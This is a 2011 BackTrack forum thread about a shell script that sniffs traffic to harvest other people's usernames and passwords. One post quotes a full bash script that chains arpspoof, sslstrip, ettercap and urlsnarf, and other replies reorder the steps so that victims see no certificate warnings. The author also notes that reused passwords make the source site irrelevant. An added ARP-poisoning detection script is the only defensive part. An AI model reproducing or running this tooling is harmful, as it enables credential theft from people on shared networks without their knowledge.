
Thread: Script for sniffing traffic.

  1. #11
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Script for sniffing traffic.

    The link on http://comax.pagesperso-orange.fr/info/#yamas and the link http://comax.pagesperso-orange.fr/info/mitm/ both point to an old version of the script: VERSION="0.6.9\033[31m-BT5\033[m"

    If you download from the update link in the script, http://comax.pagesperso-orange.fr/mitm.sh, then you get the latest version: VERSION="0.7.2\033[31m-BT5\033[m"

    It's likely user error due to my lack of knowledge, but I couldn't get the 0.6.9 version to run while the 0.7.2 version ran without issue. With version 0.6.9 it was complaining about an error on line #10 that I couldn't find any problems with.

  2. #12
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Script for sniffing traffic.

    Yeahp, use the updated 0.7.2-BT5 version, it's the last one to date ! I update the website only from time to time. But since it seems to be confusing, I'll do it as soon as I can ! I'll edit this post once everything is clarified, thanks for the report.
    Checked just after posting, the "download script" button links to the good version. The pastebin is "old" though. I'll update it as well !
    (Were you copying pastebin rather than downloading ?)

    EDIT : all right ! Everything should now point to the latest version. Also, please note that as soon as I have finished testing a "version", I upload it to the server. So even if the website doesn't say anything about it, you can try updating through the script or the website. Of course, don't hesitate to post here, PM me, or mail me for anything !
    Last edited by comaX; 05-18-2011 at 03:53 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #13
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Script for sniffing traffic.

    I think I did a save-as on the Download Raw link from the pastebin version. I thought this was the primary source location until I started digging through the script and noticed where it got the file from. Once I figured that out I just ran the wget line at a prompt to get the file.

  4. #14
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re : Re: Script for sniffing traffic.

    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    Any help would be appreciated.

  5. #15
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Re : Re: Script for sniffing traffic.

    Quote (originally posted by ckcrown):
    > ComaX.
    > This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    > Any help would be appreciated.

    Yeah, I thought about that, but the parsing is already pretty intense, so I didn't want to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script [*except for that little work-around mentioned earlier]
    So about those sites, two things :
    1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
    2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

    If you have an idea for parsing sites at the same time as the rest, without being too much of a job, I'm all ears !

    On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There will shortly be an option to install it, and/or update it.
    Last edited by comaX; 05-21-2011 at 04:15 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  6. #16
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re: Re : Re: Script for sniffing traffic.

    ComaX,
    I ran across a script a while back called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass. I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    Last edited by sickness; 05-21-2011 at 07:34 AM.

  7. #17
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Re : Re: Script for sniffing traffic.

    My vote is for the option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to do something like this. I could, and will figure it out by searching these forums, of course.

    Edit:

    Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

    Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system is taken out of the middle.
    Last edited by sickness; 05-21-2011 at 07:35 AM. Reason: Merged posts.
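
An added defensive example, not part of any post in this thread or of either script: the redirection discussed above depends on the target's ARP cache mapping the gateway IP to the sniffing host's MAC, so a monitored host can check its own table for that signature. The addresses, the baseline MAC and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example: find the ARP-cache signature left by arpspoof-style
# poisoning. Input is text in /proc/net/arp format; both tables are constructed.

CLEAN='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.23     0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0'

# Same LAN while 192.168.1.23 answers for the gateway address.
POISONED='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         AA:BB:CC:DD:EE:01     *        wlan0
192.168.1.23     0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0'

# Print "mac ip1,ip2,..." for every MAC claimed by more than one IP address.
duplicate_macs() {
    awk 'NR > 1 && $4 != "00:00:00:00:00:00" {
             mac = tolower($4)
             if (mac in ips) ips[mac] = ips[mac] "," $1
             else ips[mac] = $1
             count[mac]++
         }
         END { for (m in count) if (count[m] > 1) print m, ips[m] }' | sort
}

# Print the MAC the table currently holds for one IP (nothing if absent).
mac_for_ip() {
    awk -v ip="$1" 'NR > 1 && $1 == ip { print tolower($4) }' | head -n 1
}

# usage: arp_verdict <gateway-ip> <known-good-gateway-mac> < arp-table
arp_verdict() (
    table=$(cat)
    want=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    have=$(printf '%s\n' "$table" | mac_for_ip "$1")
    dups=$(printf '%s\n' "$table" | duplicate_macs)
    if [ -n "$have" ] && [ "$have" != "$want" ]; then
        echo "ALERT gateway $1 moved from $want to $have"
    elif [ -n "$dups" ]; then
        echo "WARN shared MAC: $dups"
    else
        echo "OK"
    fi
)

printf '%s\n' "$CLEAN"    | arp_verdict 192.168.1.1 00:11:22:33:44:55
printf '%s\n' "$POISONED" | arp_verdict 192.168.1.1 00:11:22:33:44:55
```

On a live Linux host the table comes from `/proc/net/arp` on stdin. Because a cleanly stopped arpspoof re-sends the correct gateway mapping, the check has to run periodically and log its verdicts; a single look afterwards shows a clean table.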

  8. #18
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    14

    Default Re: Script for sniffing traffic.

    Hey comaX. I have played around with your script and it's very nice and clean but sometimes a lot of python errors appear. Do you know the reason?
    Here are some of them..
    Traceback (most recent call last):
      File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
        return callWithContext({"system": lp}, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
        return func(*args,**kw)
    --- <exception caught here> ---
      File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
        why = getattr(selectable, method)()
      File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
        return self.protocol.dataReceived(data)
      File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
        return self.rawDataReceived(data)
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
        self.handleResponseEnd()
      File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
        HTTPClient.handleResponseEnd(self)
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
        self.handleResponse(b)
      File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 134, in handleResponse
        self.shutdown()
      File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 154, in shutdown
        self.client.finish()
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
        "Request.finish called on a request after its connection was lost; "
    exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

  9. #19
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Script for sniffing traffic.

    Thanks for the feedback !

    Quote (originally posted by ckcrown):
    > ComaX,
    > I ran across a script a while back called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass. I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

    Hmm, I'll look into that. But I won't spend too much time either, for the reasons I evoked earlier.

    Quote (originally posted by ShortBuss):
    > Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.
    >
    > Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system is taken out of the middle.

    Very good point ! I'll try and do that, it shouldn't be much of a problem. For arpspoof, I believe it is a clean shutdown, since in every test I did, I could get back on the internet immediately.

    [Edit] Status : DONE

    That's just great ! You don't have to click back into the main window for the name, so it's smoother, and that way we're sure we don't send non-stripped ssl. You just earned a place in the credits :P (If you don't want your nick in it, just tell me)
    I don't know why I didn't think of that before !
    And yes, arpspoof is cleanly shut.

    Quote (originally posted by kafteras):
    > Hey comaX. I have played around with your script and it's very nice and clean but sometimes a lot of python errors appear. Do you know the reason?
    > Here are some of them..

    Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
    All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

    [Edit] Status : DONE

    Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !

    Thanks for the feedback again, I'll try to work on that tonight or tomorrow.

    Edit : with all that and some stuff here and there, 0.7.4 is ready ! It will be online tomorrow (22/05/11) !
    Last edited by comaX; 05-21-2011 at 04:53 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  10. #20
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    3

    Default Re: Script for sniffing traffic.

    Awesome script, thanks for putting the time into it.
